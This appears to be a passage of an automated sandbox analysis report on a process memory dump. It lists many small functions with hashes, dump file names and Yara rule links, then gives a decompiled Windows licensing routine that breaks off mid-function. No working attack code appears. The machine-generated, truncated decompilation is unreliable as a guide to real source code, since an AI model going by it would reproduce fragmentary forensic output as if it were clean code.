                                          • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                          • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                          • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                          • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0074F8CC, Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                          • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                          • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                          • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00751930, Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                          • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                          • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                          • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0074F938, Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                          • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                          • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                          • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0074FA50, Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                          • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                          • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                          • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0074FA20, Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                          • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                          • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                          • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0074FAB8, Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                          • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                          • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                          • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0074FB50, Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                          • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                          • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                          • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0074FBE8, Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                          • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                          • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                          • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00750C40, Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                          • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                          • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                          • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0074FC48, Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                          • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                          • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                          • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0074FC30, Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                          • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                          • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                          • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0074FD5C, Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                          • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                          • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                          • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00751D80, Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                          • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                          • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                          • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0074FE24, Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                          • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                          • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                          • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0074FF34, Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                          • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                          • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                          • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0074FFFC, Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                          • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                          • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                          • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00778788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E00778788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00778460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0075E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0077718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00778460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0075E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0077718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00778460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00778460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00778460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0075E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0075E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0077718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0075E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00752340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0076E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0075E2A8(_t322,  &_v68, _v16);
								if(E00775553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0076E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0075E2A8(_t322,  &_v68, _t236);
								if(E00775553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0075E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0075E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0077718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0075E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00752340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0076E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0075E2A8(_v12,  &_v68, _v16);
							if(E00775553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0076E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0075E2A8(_t322,  &_v68, _t269);
							if(E00775553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0075E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0075E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0077718A(_t284);
